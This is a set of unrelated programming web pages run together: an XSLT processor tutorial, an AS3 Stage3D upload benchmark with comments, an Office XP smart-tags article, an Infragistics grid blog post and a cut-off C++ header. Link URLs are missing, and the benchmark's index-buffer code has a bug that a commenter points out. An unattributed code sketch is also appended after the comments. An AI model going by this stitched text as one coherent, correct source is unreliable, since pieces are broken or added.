You can get James Clark’s XT at. Besides XT itself, you’ll also need a SAX-compliant XML parser, such as the one we used in the previous chapter that comes with the XML for Java packages, or James Clark’s own XP parser, which you can get at xp/ index.html. XT is a Java application. Included in the XT download is the JAR file you’ll need, xt.jar. The XT download also comes with sax.jar, which holds James Clark’s SAX parser. You can also use the XML for Java parser with XT; to do that, you must include both xt.jar and xerces.jar in your CLASSPATH, something like this:

%set CLASSPATH=%CLASSPATH%;C:\XML4J_3_0_1\xerces.jar;C:\xt\xt.jar;

Then you can use the XT transformation class, com.jclark.xsl.sax.Driver. You supply the name of the SAX parser you want to use, such as the XML for Java class org.apache.xerces.parsers.SAXParser, by setting the com.jclark.xsl.sax.parser variable with the java -D switch. Here’s how I use XT to transform planets.xml, using planets.xsl, into planets.html:

%java -Dcom.jclark.xsl.sax.parser=org.apache.xerces.parsers.SAXParser com.jclark.xsl.sax.Driver planets.xml planets.xsl planets.html

XT is also packaged as a Win32 exe. To use xt.exe, however, you will need the Microsoft Java Virtual Machine (VM) installed (included with Internet Explorer). Here’s an example in Windows that performs the same transformation as the previous command:

C:\>xt planets.xml planets.xsl planets.html

XML for Java

You can also use the IBM alphaWorks XML for Java XSLT package, called LotusXSL. LotusXSL implements an XSLT processor in Java that can be used from the command line, in an applet or a servlet, or as a module in another program.
By default, it uses the XML4J XML parser, but it can interface to any XML parser that conforms to either the DOM or the SAX specification. Here’s what the XML for Java site says about LotusXSL: "LotusXSL 1.0.1 is a complete and a robust reference implementation of the W3C Recommendations for XSL Transformations (XSLT) and the XML Path Language (XPath)."

You can get LotusXSL at; just click the XML item in the frame at left, click LotusXSL, and then click the Download button (or you can go directly to, although that URL may change). The download includes xerces.jar, which includes the parsers that the rest of the LotusXSL package uses (although you can use other parsers), and xalan.jar, which is the LotusXSL JAR file. To use LotusXSL, make sure that you have xalan.jar in your CLASSPATH; to use the XML for Java SAX parser, make sure that you also have xerces.jar in your CLASSPATH, something like this:

%set CLASSPATH=%CLASSPATH%;C:\lotusxsl_1_0_1\xalan.jar;C:\xsl\lotusxsl_1_0_1\xerces.jar;

Unfortunately, the LotusXSL package does not have a built-in class that will take a document name, a style sheet name, and an output file name like XT. However, I’ll create one named xslt, and you can use this class quite generally for transformations. Here’s what xslt.java looks like:

import org.apache.xalan.xslt.*;

public class xslt
{
    public static void main(String[] args)
    {
        try {
            XSLTProcessor processor = XSLTProcessorFactory.getProcessor();
            processor.process(new XSLTInputSource(args[0]),
                new XSLTInputSource(args[1]),
                new XSLTResultTarget(args[2]));
        } catch (Exception e) {
            System.err.println(e.getMessage());
        }
    }
}

After you’ve set the CLASSPATH as indicated, you can create xslt.class with javac like this:

%javac xslt.java

The file xslt.class is all you need.
After you’ve set the CLASSPATH as indicated, you can use xslt.class like this to transform planets.xml, using the style sheet planets.xsl, into planets.html:

%java xslt planets.xml planets.xsl planets.html

What does planets.html look like? In this case, I’ve set up planets.xsl to simply place the names of the planets in <P> HTML elements. Here are the results, in planets.html:

<HTML>
<P>Mercury</P>
<P>Venus</P>
<P>Earth</P>
</HTML>

That’s the kind of transformation we’ll see in this chapter. There’s another way to transform XML documents without a standalone program—you can use a client program such as a browser to transform documents.

Using Browsers to Transform XML Documents

Internet Explorer includes a partial implementation of XSLT; you can read about Internet Explorer support at. That support is based on the W3C XSL working draft of December 16, 1998 (which you can find at); as you can imagine, things have changed considerably since then.

To use planets.xml with Internet Explorer, I have to make a few modifications. For example, I have to convert the type attribute in the <?xml-stylesheet?> processing instruction from "text/xml" to "text/xsl":

<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="planets.xsl"?>

I can also convert the style sheet planets.xsl for use in Internet Explorer. A major difference between the W3C XSL recommendation and the XSL implementation in Internet Explorer is that Internet Explorer doesn’t implement any default XSL rules (which I’ll discuss in this chapter). This means that I have to explicitly include an XSL rule for the root of the document, which you specify with /.
I also have to use a different namespace in the style sheet, and omit the version attribute in the <xsl:stylesheet> element:

<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">

<xsl:template match="/">
    <HTML>
        <xsl:apply-templates/>
    </HTML>
</xsl:template>

<xsl:template match="PLANETS">
    <xsl:apply-templates/>
</xsl:template>

<xsl:template match="PLANET">
    <P>
        <xsl:value-of select="NAME"/>
    </P>
</xsl:template>

</xsl:stylesheet>

You can see the results of this transformation in Figure 13.1.

Figure 13.1 Performing an XSL transformation in Internet Explorer.

We now have an overview of XSL transformations and have seen them at work. It’s time to see how to create XSLT style sheets in detail.
http://www.peachpit.com/articles/article.aspx?p=133615&amp;seqNum=11
Stage3D Upload Speed Tester

Since Flash Player 11’s. The performance test below checks the upload speeds, in both hardware and software mode, of all of these types:

Texture from...
- BitmapData
- Vector
- ByteArray

VertexBuffer3D from...
- Vector
- ByteArray

IndexBuffer3D from...
- Vector
- ByteArray

Check it out:

package
{
    import flash.display3D.*;
    import flash.display3D.textures.*;
    import flash.external.*;
    import flash.display.*;
    import flash.sampler.*;
    import flash.system.*;
    import flash.events.*;
    import flash.utils.*;
    import flash.text.*;
    import flash.geom.*;
    import com.adobe.utils.*;

    public class Stage3DUploadTester extends Sprite
    {
        private var __stage3D:Stage3D;
        private var __logger:TextField = new TextField();
        private var __context:Context3D;
        private var __driverInfo:String;

        private var __texture:Texture;
        private var __bmdNoAlpha:BitmapData;
        private var __bmdAlpha:BitmapData;
        private var __texBytes:ByteArray;

        private var __vertexBuffer:VertexBuffer3D;
        private var __vbVector:Vector.<Number>;
        private var __vbBytes:ByteArray;

        private var __indexBuffer:IndexBuffer3D;
        private var __ibVector:Vector.<uint>;
        private var __ibBytes:ByteArray;

        public function Stage3DUploadTester()
        {
            __stage3D = stage.stage3Ds[0];

            __logger.autoSize = TextFieldAutoSize.LEFT;
            addChild(__logger);

            // Allocate texture data
            __bmdNoAlpha = new BitmapData(2048, 2048, false, 0xffffffff);
            __bmdAlpha = new BitmapData(2048, 2048, true, 0xffffffff);
            __texBytes = new ByteArray();
            var size:int = __texBytes.length = 2048*2048*4;
            for (var i:int; i < size; ++i)
            {
                __texBytes[i] = 0xffffffff;
            }

            // Allocate vertex buffer data
            size = 65535*64;
            __vbVector = new Vector.<Number>(size);
            for (i = 0; i < size; ++i)
            {
                __vbVector[i] = 1.0;
            }
            __vbBytes = new ByteArray();
            __vbBytes.length = size*4;
            for (i = 0; i < size; ++i)
            {
                __vbBytes.writeFloat(1.0);
            }
            __vbBytes.position = 0;

            // Allocate index buffer data
            size = 524287;
            __ibVector = new Vector.<uint>(size);
            for (i = 0; i < size; ++i)
            {
                __ibVector[i] = 1.0;
            }
            __ibBytes = new ByteArray();
            __ibBytes.length = size*4;
            for (i = 0; i < size; ++i)
            {
                __ibBytes.writeFloat(1.0);
            }
            __ibBytes.position = 0;

            setupContext(Context3DRenderMode.AUTO);
        }

        private function setupContext(renderMode:String): void
        {
            __stage3D.addEventListener(Event.CONTEXT3D_CREATE, onContextCreated);
            __stage3D.requestContext3D(renderMode);
        }

        private function onContextCreated(ev:Event): void
        {
            __stage3D.removeEventListener(Event.CONTEXT3D_CREATE, onContextCreated);

            var first:Boolean = __logger.text.length == 0;
            if (first)
            {
                __logger.appendText("Driver,Test,Time,Bytes/Sec\n");
            }

            const width:int = stage.stageWidth;
            const height:int = stage.stageHeight;
            __context = __stage3D.context3D;
            __context.configureBackBuffer(width, height, 0, true);
            __driverInfo = __context.driverInfo;

            __texture = __context.createTexture(
                2048,
                2048,
                Context3DTextureFormat.BGRA,
                false
            );
            __vertexBuffer = __context.createVertexBuffer(65535, 64);
            __indexBuffer = __context.createIndexBuffer(524287);

            runTests();

            if (first)
            {
                __context.dispose();
                setupContext(Context3DRenderMode.SOFTWARE);
            }
        }

        private function runTests(): void
        {
            var beforeTime:int;
            var afterTime:int;
            var time:int;

            beforeTime = getTimer();
            __texture.uploadFromBitmapData(__bmdNoAlpha);
            afterTime = getTimer();
            time = afterTime - beforeTime;
            row("Texture from BitmapData w/o alpha", time, 2048*2048*4);

            beforeTime = getTimer();
            __texture.uploadFromBitmapData(__bmdAlpha);
            afterTime = getTimer();
            time = afterTime - beforeTime;
            row("Texture from BitmapData w/ alpha", time, 2048*2048*4);

            beforeTime = getTimer();
            __texture.uploadFromByteArray(__texBytes, 0);
            afterTime = getTimer();
            time = afterTime - beforeTime;
            row("Texture from ByteArray", time, 2048*2048*4);

            beforeTime = getTimer();
            __vertexBuffer.uploadFromVector(__vbVector, 0, 65535);
            afterTime = getTimer();
            time = afterTime - beforeTime;
            row("VertexBuffer from Vector", time, 65535*64*4);

            beforeTime = getTimer();
            __vertexBuffer.uploadFromByteArray(__vbBytes, 0, 0, 65535);
            afterTime = getTimer();
            time = afterTime - beforeTime;
            row("VertexBuffer from ByteArray", time, 65535*64*4);

            beforeTime = getTimer();
            __indexBuffer.uploadFromVector(__ibVector, 0, 524287);
            afterTime = getTimer();
            time = afterTime - beforeTime;
            row("IndexBuffer from Vector", time, 524287*4);

            beforeTime = getTimer();
            __indexBuffer.uploadFromByteArray(__ibBytes, 0, 0, 524287);
            afterTime = getTimer();
            time = afterTime - beforeTime;
            row("IndexBuffer from ByteArray", time, 524287*4);
        }

        private function row(name:String, time:int, bytes:int): void
        {
            __logger.appendText(
                __driverInfo + "," +
                name + "," +
                time + "," +
                (bytes/time).toFixed(2) + "\n"
            );
        }
    }
}

I ran this performance test with the following environment:

- Flex SDK (MXMLC) 4.5.1.21328, compiling in release mode (no debugging or verbose stack traces)
- Release version of Flash Player 11.0.1.152
- 2.4 GHz Intel Core i5
- Mac OS X 10.7.2

And got these results:

There is a clear order of speed in all tests, regardless of hardware or software mode and of the type of GPU resource being uploaded to:

1. ByteArray (fastest)
2. Vector
3. BitmapData (slowest)

Only the magnitude of the advantage changes. In particular, if you can manage to upload a vertex or index buffer from a ByteArray, you’re assured a huge performance win.

Uploading texture data seems much faster in software than in hardware: a 3x improvement. As for vertex and index buffers, it’s more of a mixed bag. Software is faster when uploading vertex buffers from a Vector, hardware is faster when uploading index buffers from a ByteArray, and the rest are a tie.

Vertex buffers are curiously quicker to upload than index buffers. The difference is more dramatic with software rendering (3x faster) than with hardware rendering (50% faster).

More so than ever before in my performance articles, it is important to keep in mind that the performance results posted above are valid only for the test environment that produced them.
These numbers may change on Windows, which uses DirectX instead of OpenGL, or any of a number of mobile handsets using OpenGL ES. Spot a bug? Have a suggestion? Different results on your environment? Post a comment! #1 by Smily on October 31st, 2011 · | Quote My results for the following config: Flash Player 11.0.1.152 Firefox 7.0.1 Windows 7 Intel Core 2 Quad Q6600 GeForce 560ti Driver,Test,Time,Bytes/Sec DirectX9 (Direct blitting),Texture from BitmapData w/o alpha,22,762600.73 DirectX9 (Direct blitting),Texture from BitmapData w/ alpha,11,1525201.45 DirectX9 (Direct blitting),Texture from ByteArray,11,1525201.45 DirectX9 (Direct blitting),VertexBuffer from Vector,22,762589.09 DirectX9 (Direct blitting),VertexBuffer from ByteArray,11,1525178.18 DirectX9 (Direct blitting),IndexBuffer from Vector,2,1048574.00 DirectX9 (Direct blitting),IndexBuffer from ByteArray,2,1048574.00 Software (Direct blitting),Texture from BitmapData w/o alpha,21,798915.05 Software (Direct blitting),Texture from BitmapData w/ alpha,12,1398101.33 Software (Direct blitting),Texture from ByteArray,11,1525201.45 Software (Direct blitting),VertexBuffer from Vector,22,762589.09 Software (Direct blitting),VertexBuffer from ByteArray,11,1525178.18 Software (Direct blitting),IndexBuffer from Vector,2,1048574.00 Software (Direct blitting),IndexBuffer from ByteArray,2,1048574.00 Note that the numbers vary quite a bit from test to test, with “DirectX9 (Direct blitting),Texture from BitmapData w/o alpha” running as fast as 15ms and as slow as 28ms. #2 by Tronster on October 31st, 2011 · | Quote One other curiosity to note is that uploading texture data seems much faster in hardware compared to software. I may be reading this wrong, but doesn’t your graph show the opposite of this? Looks like all three types of software uploading can push more bytes/sec than hardware. 
#3 by jackson on October 31st, 2011

The graphs show bytes per second, so a higher bar is better, as opposed to most of my articles, which show time, where a lower bar is better. Sorry for the confusion.

#4 by skyboy on October 31st, 2011

On your system, software is faster, whereas the article said hardware is faster.

#5 by jackson on October 31st, 2011

Ah, I see now. I’ve updated the article to have more accurate conclusions on the rendering mode: hardware vs. software.

#6 by James on November 2nd, 2011

My results are somehow all the same? What does Infinity mean? The laptop is a Lenovo Y460.

Driver,Test,Time,Bytes/Sec
DirectX9 (Direct blitting),Texture from BitmapData w/o alpha,10,1677721.60
DirectX9 (Direct blitting),Texture from BitmapData w/ alpha,10,1677721.60
DirectX9 (Direct blitting),Texture from ByteArray,0,Infinity
DirectX9 (Direct blitting),VertexBuffer from Vector,10,1677696.00
DirectX9 (Direct blitting),VertexBuffer from ByteArray,10,1677696.00
DirectX9 (Direct blitting),IndexBuffer from Vector,0,Infinity
DirectX9 (Direct blitting),IndexBuffer from ByteArray,0,Infinity
Software (Direct blitting),Texture from BitmapData w/o alpha,10,1677721.60
Software (Direct blitting),Texture from BitmapData w/ alpha,0,Infinity
Software (Direct blitting),Texture from ByteArray,10,1677721.60
Software (Direct blitting),VertexBuffer from Vector,10,1677696.00
Software (Direct blitting),VertexBuffer from ByteArray,10,1677696.00
Software (Direct blitting),IndexBuffer from Vector,0,Infinity
Software (Direct blitting),IndexBuffer from ByteArray,0,Infinity

#7 by skyboy on November 8th, 2011

Heh. Infinity is due to x/0 in AS3 resulting in Infinity instead of NaN; though 0/0 is still NaN.

#8 by Jacob on November 19th, 2011

Here are results from my machine:

Driver,Test,Time,Bytes/Sec
OpenGL Vendor=ATI Technologies Inc. Version=2.1 ATI-1.6.38 Renderer=ATI Radeon HD 6490M OpenGL Engine GLSL=1.20 (Direct blitting),Texture from BitmapData w/o alpha,16,1048576.00
OpenGL …Texture from BitmapData w/ alpha,16,1048576.00
OpenGL …Texture from ByteArray,16,1048576.00
OpenGL …VertexBuffer from Vector,36,466026.67
OpenGL …VertexBuffer from ByteArray,2,8388480.00
OpenGL …IndexBuffer from Vector,3,699049.33
OpenGL …IndexBuffer from ByteArray,1,2097148.00
Software (Direct blitting),Texture from BitmapData w/o alpha,9,1864135.11
Software (Direct blitting),Texture from BitmapData w/ alpha,3,5592405.33
Software (Direct blitting),Texture from ByteArray,3,5592405.33
Software (Direct blitting),VertexBuffer from Vector,13,1290535.38
Software (Direct blitting),VertexBuffer from ByteArray,3,5592320.00
Software (Direct blitting),IndexBuffer from Vector,2,1048574.00
Software (Direct blitting),IndexBuffer from ByteArray,1,2097148.00

#9 by David on November 21st, 2011

nvidia gtx560, i7 2600k

Driver,Test,Time,Bytes/Sec
DirectX9 (Direct blitting),Texture from BitmapData w/o alpha,4,4194304.00
DirectX9 (Direct blitting),Texture from BitmapData w/ alpha,2,8388608.00
DirectX9 (Direct blitting),Texture from ByteArray,3,5592405.33
DirectX9 (Direct blitting),VertexBuffer from Vector,6,2796160.00
DirectX9 (Direct blitting),VertexBuffer from ByteArray,3,5592320.00
DirectX9 (Direct blitting),IndexBuffer from Vector,1,2097148.00
DirectX9 (Direct blitting),IndexBuffer from ByteArray,1,2097148.00
Software (Direct blitting),Texture from BitmapData w/o alpha,4,4194304.00
Software (Direct blitting),Texture from BitmapData w/ alpha,3,5592405.33
Software (Direct blitting),Texture from ByteArray,2,8388608.00
Software (Direct blitting),VertexBuffer from Vector,5,3355392.00
Software (Direct blitting),VertexBuffer from ByteArray,3,5592320.00
Software (Direct blitting),IndexBuffer from Vector,1,2097148.00
Software (Direct blitting),IndexBuffer from ByteArray,1,2097148.00

I really don’t understand why the BitmapData would
upload slower without the alpha channel. Does the GPU need the alpha channel, so that all RGB pixels get converted to RGBA, or where is this coming from? By the way, Jackson, it would be nice if you could create some sort of best-practice article for the new 3D API, based on your performance research. After all the years of performance optimizing in Flash, and now this new technology, I'm constantly struggling with FPS drops in my experiments and I just don't know where they come from. The tutorials on the web are quite thin and I don't really trust the Adobe tutorials: they posted so many bad/slow examples in the past, I don't think it's so much better this time ;) Thanks for your great efforts.

#10 by jackson on November 21st, 2011

Your guess is as good as mine about the alpha channel upload. That does seem plausible though. Thanks for the idea about a “best practices” article for Stage3D. I’ve been writing a lot on the subject recently so that may very well happen. :)

#11 by Sam on February 5th, 2012

Hi Jackson, the IndexBuffer code needs a correction: you should use writeShort() instead of writeFloat(), and the size should be size*2 instead of size*4, because each index is only 16 bits wide.

#12 by Matt Lockyer on March 21st, 2012

Hey Jackson, wondering if you could revisit this. I’ve tested some Vectors and ByteArrays, and I’m wondering what the cost of updating the ByteArray would be if that is incorporated into the test. Roughly, I’m seeing average framerates of 32-33 for Vectors compared to 29-30 for ByteArrays… I think this might be because you must update the ByteArray and this access is slower? Is ba.writeFloat(…) slower than data[x] = y?

#13 by jackson on March 21st, 2012

Hey Matt, if I’m understanding correctly, you’d like a test of Vector access as opposed to multiple forms of ByteArray access. If so, this sounds like a great idea for an article and one I can’t believe I haven’t written yet!
I’ll definitely add it to my list of articles to write. Thanks for the tip, -Jackson

#14 by Matt Lockyer on March 21st, 2012

Yes, that’s correct! Thank you for taking the time to follow up. The basic premise behind why this would be an interesting article rests in the need for us (AS3 developers) to constantly update many values per object per frame into a single Vector or ByteArray for uploading to the vertex buffer. Thanks again!

#15 by Glidias on January 24th, 2013

I have a bit of a dilemma. I know ByteArray uploads to Stage3D are faster. Unfortunately, in order to write a series of floats to a ByteArray at randomly accessed positions, I have to constantly set the ByteArray.position pointer and then call writeFloat(). I’m not sure if indexed access is possible here, since I’m not writing bytes but a full float. So I fear that doing this in the CPU pre-processing step would take up more resources compared to simply updating values in a dense fixed-size Vector, which should be much faster and easier to read code-wise. I guess I can get around this ByteArray problem by using some domain memory API to handle this stuff, since my application could allocate a fixed ByteArray that I can use specifically for things like vertex data uploads, on-the-fly geometry collision detection, calculations, etc. The annoying thing about Flash is that domain memory isn’t available up front unless I use something like Haxe or Apparat, and I’d also need to register for a license. Anyway, I’m doing such ByteArray uploads per frame, but only occasionally for various pooled terrain LOD chunks in a quad-tree which are no longer cached (i.e. their vertex data was invalidated by other used chunks). So it doesn’t happen too often across many frames; thus, no need to prematurely optimize things. Maybe you can provide a benchmark for this (randomly accessed positions and writing floats to a ByteArray, then uploading, compared to doing it for Vectors).
Maybe even do indexed access for the ByteArray (i.e. not using the writeFloat() method), but you’d need to write into 4 byte indices manually to compose a float, and I’m not too sure how to do that…

#16 by jackson on January 24th, 2013

I haven’t done such a test, but it’s intriguing. This is actually a common problem when using Stage3D with AS3, particularly when you’re trying to avoid the conversion from Number to 32-bit floating point values when uploading vertex buffers and constants. You can avoid it by writing out 32-bit floats to a ByteArray and then uploading that, which really helps CPU usage. In your situation it seems like the ByteArray version may be quicker, especially if you’re willing to go the licensed route with domain memory. Of course there’s only one way to find out. I’ll see about putting together a head-to-head performance test.

#17 by Glidias on February 7th, 2013

Well, domain memory is no longer categorised as a Premium Feature. So I think domain memory should be the best approach to avoid costly ByteArray manipulation prior to uploading via ByteArray. You only need to manage your offsets/ranges, though, since most domain memory implementations use one ByteArray, so this should be easy to handle with various Haxe libs or Apparat memory managers.

#18 by Xavi Colomer on April 23rd, 2013

Hi there, I’m having some problems uploading 196,000 vertices. It takes up to 15-20 seconds to upload them to the context. Is that normal?

vector is a Vector.
buffer.elements = Engine.context.createVertexBuffer(size, buffer.itemSize);
buffer.elements.uploadFromVector(vector, 0, size);

I also added this question on SO and Adobe. Thanks!

#19 by jackson on April 23rd, 2013

No, that’s not normal. In the test from this article I upload 64k vertices in under 50 milliseconds. It’s not that I’m doing anything tricky; that’s just how long it took in the test environment using the normal uploading strategy.
Are you using a super slow computer? Are you inadvertently including way more in your time measurement? What are your results using the “Try” link from the article on the same computer that takes 15-20 seconds?

#20 by Xavi Colomer on April 24th, 2013

Hi Jackson, thank you for your reply. It’s difficult to say how much time it takes because the Flash Player appears to be frozen for 15-20 seconds during the upload. I am porting a customised three.js engine to Flash as a fallback for old browsers. Small scenes work great, but complex ones increase their rendering time exponentially. We just found a couple of bugs on the JS side, but I definitely have to improve the Flash side. I’ll tell you more once we fix the JS bug, which is increasing the data unnecessarily. Thanks!

#21 by Xavi Colomer on April 24th, 2013

Hi Jackson, we found what the problem is. Apparently the problem is ExternalInterface: it has problems sending 200,000 vertices.

#22 by Zwick on May 2nd, 2013

My results on a 5-year-old XPS M1530 with an M8600GT.
Driver,Test,Time,Bytes/Sec
OpenGL,Texture from BitmapData w/o alpha,51,328965.02
OpenGL,Texture from BitmapData w/ alpha,39,430185.03
OpenGL,Texture from ByteArray,39,430185.03
OpenGL,VertexBuffer from Vector,32,524280.00
OpenGL,VertexBuffer from ByteArray,24,699040.00
OpenGL,IndexBuffer from Vector,14,149796.29
OpenGL,IndexBuffer from ByteArray,2,1048574.00
Software Hw_disabled=explicit,Texture from BitmapData w/o alpha,16,1048576.00
Software Hw_disabled=explicit,Texture from BitmapData w/ alpha,11,1525201.45
Software Hw_disabled=explicit,Texture from ByteArray,16,1048576.00
Software Hw_disabled=explicit,VertexBuffer from Vector,43,390161.86
Software Hw_disabled=explicit,VertexBuffer from ByteArray,16,1048560.00
Software Hw_disabled=explicit,IndexBuffer from Vector,3,699049.33
Software Hw_disabled=explicit,IndexBuffer from ByteArray,2,1048574.00

#24 by NickyD on June 26th, 2014

I know this article is old, but I have been working with batched geometry and ran into a little problem; hoping you can shed some light on the matter. Adobe Scout reports that uploadFromVector() seems to take longer and longer to finish executing over the course of time when the number of objects to be batched is lower than the maximum number of batched objects allowed in the space from the VBO. When numVerts != BATCH_VERTEX_MAX is when I notice the strange inconsistencies in performance.

mBatchedVertexBuffer.uploadFromVector(mVertexBufferData, 0, numVerts);
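Sam’s correction in comment #11 is worth sketching. The following is hypothetical AS3 (untested here); it assumes a size variable and an indexBuffer created elsewhere with Context3D.createIndexBuffer(size):

```actionscript
// Hypothetical sketch: filling a ByteArray for an index buffer upload.
// Indices are 16-bit, so write size*2 bytes with writeShort(),
// not size*4 bytes with writeFloat().
var indices:ByteArray = new ByteArray();
indices.endian = Endian.LITTLE_ENDIAN; // Stage3D expects little-endian data
for (var i:int = 0; i < size; ++i)
{
    indices.writeShort(i);
}
indexBuffer.uploadFromByteArray(indices, 0, 0, size);
```

The ByteArray and Endian classes come from flash.utils; the endian setting matters because Stage3D rejects big-endian (the AS3 default) byte data.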
https://jacksondunstan.com/articles/1617?replytocom=15207
Web pages have traditionally relied on hyperlinks to associate text with related information residing on file systems, Web servers, or Usenet News. With the introduction of smart tags in Microsoft Office XP, you can enhance this type of hyperlinking behavior by associating text not only with multiple resources but also with information provided by custom applications. Smart tags provide users with the ability to associate text and data with actions. For example, if you type the stock ticker symbol INTM into a Word 2002 document or an Excel 2002 spreadsheet, and smart tags are enabled, a list of actions will appear, such as viewing a stock quote, company report, or recent news from a financial information Web site. Office XP provides several smart tags in the box, but you can develop your own smart tags as well. For example, you can develop smart tags that automate lookups, such as finding street addresses in a mapping service or pairing city names with local weather information. While some people see great potential in this external linking of resources, others see it as yet another attempt by Microsoft to dominate the Internet by allowing the browser to control links on arbitrary Web pages. Not surprisingly, most of the smart tag destination sites are somewhere in the Microsoft Network. This way Microsoft integrates its content even in places where the user might not want it. Also, it is not acceptable that the browser changes the original document by adding links to it. In some countries, such as Germany, that might make Microsoft legally responsible for the content of the page. Looking at the current beta of Internet Explorer 6 shows how useless this feature is in practice, though: a page talking about everybody's darling, the IRS, offers links to its alleged stock quote, which of course refers to a completely unrelated real estate company. One would assume that without more meta-data in the HTML (using XML, anybody?)
it would be as difficult to come up with good guesses as it currently is for search engines. If the above did not put you off, the following paragraphs show you how to make your Web pages smart-tag aware.

To add smart tags to Web pages, you can use a text or HTML editor. To view smart tags, users must have the following software installed on their computers: Office XP, Microsoft Internet Explorer 5 or later, and the appropriate smart tag dynamic link library (DLL) or smart tag Extensible Markup Language (XML) list description file. To add smart tags to Web pages, you must first declare the Office namespace URI inside the Web page, and then declare one or more smart tag namespace URIs in the Web page's HTML element:

<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:myns="">

You can declare as many user-defined namespace URIs as you want in a document to uniquely qualify as many aliases as you need. However, any namespace URI other than urn:schemas-microsoft-com:office:office must match exactly one of the namespace URIs contained in a smart tag action DLL or smart tag XML list description file installed and registered on the user's computer. For example, if one of the smart tag types is declared as in the ISmartTagAction_SmartTagName property of your smart tag action DLL, or as the value of the type attribute for the smarttag element in your smart tag XML list description file, then you should declare your namespace URI in your Web page as the characters preceding the # symbol, such as. At run time, Office XP tries to match this namespace URI with one in all of the smart tag DLLs and smart tag XML list description files on a user's computer to resolve smart tag actions. If no match is found, then the smart tag actions associated with that smart tag type will not be invoked. Let's look at declaring and using smart tags.

Produced by Michael Claßen
Created: Aug 29, 2001
Revised: Aug 29, 2001
http://www.webreference.com/xml/column38/
XamDataGrid vs XamGrid: Which WPF Grid Should I Choose?

Brian Lagunas / Thursday, January 18, 2018

Which WPF grid should I choose: the xamDataGrid or the xamGrid? If you use the Infragistics Ultimate UI for WPF product, then you have asked yourself this question many times without a clear answer. Well, I’m going to make the answer crystal clear for you. Use the xamDataGrid! There, that was easy. Now that you have your answer, feel free to continue browsing the Infragistics blog for great content. If you want more information about why, and what our plans are for the xamGrid, then keep reading. But Why? The xamGrid was the product of a need to have a cross-platform grid that allows you to share code across WPF and Silverlight. While the Infragistics Ultimate UI for WPF product has always had the xamDataGrid, it was not possible to port this grid over to Silverlight because it was built to take advantage of WPF-specific APIs to squeeze out every last ounce of performance. Hence, the cross-platform xamGrid was born. Along with it came a few editors as well, which were called inputs: xamComboEditor - yes, that's an input xamCurrencyInput xamDateTimeInput xamMaskedInput xamNumericInput Back in the Silverlight days, the decision about which grid to use should have been clear: use the xamGrid and inputs if you were writing a cross-platform WPF and Silverlight app, and use the xamDataGrid if you were writing a WPF-only app. Simple, right? Well, not really. Back in those days, our messaging about which control to use was not clear. We failed at conveying a clear and concise message about which grid was the right grid for the app. Now, it’s just one heck of a confusing product for developers trying to decide which control set to use. The Infragistics Ultimate UI for WPF now has two grids, two date/time editors, two masked editors, two numeric editors, and so on. This can make it hard to choose which controls to use in your WPF app.
To make a long story short, Silverlight is dead and so is any reason to use the xamGrid or its associated input controls. Feature Disparity While the feature parity between the xamGrid and xamDataGrid is close to 90%, there are three major features that are missing from the xamDataGrid that the xamGrid has. These features are: Cell Merging Conditional Formatting Paging I know what you’re thinking: “But Brian, I use those features. I can’t use the xamDataGrid unless it has them.” Well, I have good news. Cell Merging is being added to the xamDataGrid as I write this blog and will be available in the next Infragistics Ultimate UI for WPF 18.1 release. Conditional Formatting is scheduled for the Infragistics Ultimate UI for WPF 18.2 release. Paging, on the other hand… well, I’m not sure if we’ll implement paging just yet. As a developer in the enterprise world, paging never made sense to me. With the addition of the xamDataGrid’s new async data sources, in which you can asynchronously load data as you scroll from a service of your choosing and just have the values fade in, I see no real use case for paging. If paging is a must-have for your app, please let me know. I would love to have a conversation about that. What’s the Plan? Let’s address the elephant in the room. What’s the plan for the xamGrid and its associated inputs? Honestly, if I had complete control of the universe I would get rid of them all. I would mark the xamGrid and its inputs obsolete and have everyone move to the xamDataGrid and the WPF-specific editors. Unfortunately, I can't do that. I know there are tons of customers using these controls in their apps, and the time and effort to change their code to use a different grid and/or editor is not a trivial task. So what is Infragistics going to do? We are going to make the message loud and clear about which controls you should be using. You may have already noticed some small indications of this direction.
Ever since the death of Silverlight, there has been no new feature work on the xamGrid, only critical bug fixes. The xamGrid and its inputs have been removed from the Visual Studio toolbox. They have been removed from the Infragistics Ultimate UI for WPF Sample Browser. They have been removed from the Infragistics Ultimate UI for WPF product webpage. Basically, the only way you are even using them is if you added them to your application two years ago, or if you manually added a reference to them. We are also going to officially stop all new feature work on the xamGrid and the associated inputs. This really is nothing new, but it's an official statement now. We will be updating the documentation to add a nice little "recommendation" at the top of each xamGrid and input topic so that you are constantly reminded that we want you using the xamDataGrid and the WPF-specific editors. We will continue to provide support and fix any critical bugs that are reported. The controls and their assemblies aren't going anywhere. I want you to leave the xamGrid; the xamGrid is not leaving you. Next Steps Once again, I’m not going to start removing stuff and breaking everyone. This will be a very long process (multiple years) and will give everyone plenty of time to make the move. I also understand that this may be frustrating for a lot of people who use the xamGrid and have a lot of time and code invested in it. As a fellow developer, I completely understand the position you are in and I sincerely empathize with you. However, I cannot sit by and let you continue to use a control that we have no intention of moving forward. That would not be fair to you, your customers, or the company you work for. Our investments are in the xamDataGrid. That is the grid we are moving forward with. Every release there is a new feature, improvement, or productivity tool to support it (just wait until you see the upcoming xamDataGrid control configurator). That is where I want you to be.
If you use the xamGrid and are freaking out about this blog post, please contact me. I want to put together a guide to help you migrate your code over to the xamDataGrid. I need to know what features you are using, and how you are extending or customizing the grid. I want to know if there is anything blocking you from moving to the xamDataGrid (for example, paging). Summary To be clear, we haven’t marked anything deprecated and we aren't removing any controls or assemblies from the product. The xamGrid and its inputs will live on. They will just be in a zombie-like state. If an arm falls off, we'll put it back on. We just aren't feeding it brains anymore. I just want to clean up the product of duplicate controls in different namespaces and make it clear which controls you should be using. While you are more than welcome to continue to use the xamGrid, I would still highly recommend that you make the switch to the xamDataGrid at your earliest convenience. It would be in your application's best interest to make the move. I want you to be using the best controls we have, with the highest quality, the best performance, and the brightest future. If you're making the move and run into any issues or missing features that are a must-have, then please let me know. If you are impacted by this in any way, please connect with me on Twitter (@brianlagunas), or email me directly at blagunas@infragistics.com. I would love to hear your feedback and help you with any questions or concerns you may have.
https://www.infragistics.com/community/blogs/b/infragistics/posts/xamdatagrid-vs-xamgrid-which-wpf-grid-should-i-choose
here is my class file:

#ifndef BANGER_H
#define BANGER_H

class Banger
{
private:
    static int objectCount;
    char* driver;
    char* car;
    int hits;
    bool mobile;
public:
    Banger();
    Banger(char*, char*);
    Banger(const Banger &obj);
